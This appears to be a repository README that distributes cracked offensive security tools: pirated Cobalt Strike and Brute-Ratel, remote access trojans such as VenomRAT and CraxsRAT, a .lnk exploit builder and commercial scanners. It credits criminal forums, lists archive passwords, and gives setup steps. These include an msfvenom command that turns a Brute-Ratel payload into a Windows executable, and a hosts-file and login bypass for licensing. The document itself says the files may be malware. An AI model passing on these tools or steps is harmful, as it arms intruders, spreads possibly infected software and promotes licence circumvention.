As of 1/27/2024 these tools will not be checked for malware using any sort of environment, you are responsible for any damages done to your computer, run these strictly in a VM environment.
Make sure to read notes at the bottom before opening any issue.
This is a full collection of red teaming tools which have been cracked by other people, if you need me to find anything, let me know via the issues tab.
| Tool | Link |
|---|---|
| Cobalt Strike v4.9.1 | Download |
| Brute-Ratel v1.2.2 (Scandinavian Defense) | Download |
| VenomRAT v6.0.1 | Download |
| Tool | Link |
|---|---|
| CraxsRAT v6? ( |
Download |
| SpyNote is outdated, wait for SpyNote X cracks to surface or use the tool above. |
| Tool | Link |
|---|---|
| Immunity CANVAS v7.27 | Download |
| Quantum .lnk Exploit Builder (02-10-22) | Download |
| JexBot v1.0 (READ NOTES) | Download |
| Tool | Link |
|---|---|
| Invicti Pro v24.1 | Download |
| Burp Suite PRO v2023.6.1 | Download |
| Acunetix Scanner v24.1 (Install Script) | Download |
| Xray Pro v1.9.10 | Download |
| HCL AppScan Standard v10.4.0 | Download |
| Tool | Link |
|---|---|
| Acunetix Scanner v24.1 | Download |
| Xray Pro v1.9.11 | Download |
Most of these tools are obtained from CyberArsenal and xss.is, credits for the cracks go to them.
If an archive asks for a password, try pwn3rzs, Pwn3rzs, xss.is, XSS.IS or exploit.in
Cobalt Strike requires you to deploy the teamserver on a Linux install such as Ubuntu, or whatever distro of your choice.
In order to run the Cobalt Strike client on your Windows install, you will have to run the following command:java -XX:ParallelGCThreads=4 -XX:+AggressiveHeap -XX:+UseParallelGC -Xms512M -Xmx1024M -jar cobaltstrike-client.jar.
On Linux, you can simply run start.sh.
I am not sure whether or not this version of Brute-Ratel works properly, it has not been tested at all, however from the few basic functions I am assuming it works. If it does not, someone let me know.
If Brute-Ratel fails to compile the badger.bin into a badger.exe you can use the following to manually compile it: cat badger.bin | msfvenom -p - -f exe --platform win -a x64 -o badger.exe
This version of CraxsRAT appears to be quite unstable when it comes to connections, if someone wants me to, I can attempt to find a newer version of this rat.
Immunity CANVAS contains the following: D2 Exploitation Pack v2.55 & White Phosphorus v1.28.
Upon installing AppScan make sure to replace the installed DLLs with the cracked ones.
- Run add_hosts.bat as administrator, if you get an "Access Denied" error, open "C:\Windows\System32\drivers\etc\hosts" and add the following:
127.0.0.1 jex.tools
127.0.0.1 www.jex.tools
- Run "Jex_crack.exe" and then open "JEX BOT.exe"
- Put
masterchoas the username and password and press login. Note: After logging into the JexBot, you may close "Jex_crack.exe", however you will have to re-open "Jex_crack.exe" every time you want to open the JexBot.
I am not sure if this is malware, as it is a remake of crax I've found on the xss.is forums going under "Anonymous V6", and it was also leaked according to OP.
Archive password: suspicious
Run strictly in a VM environment.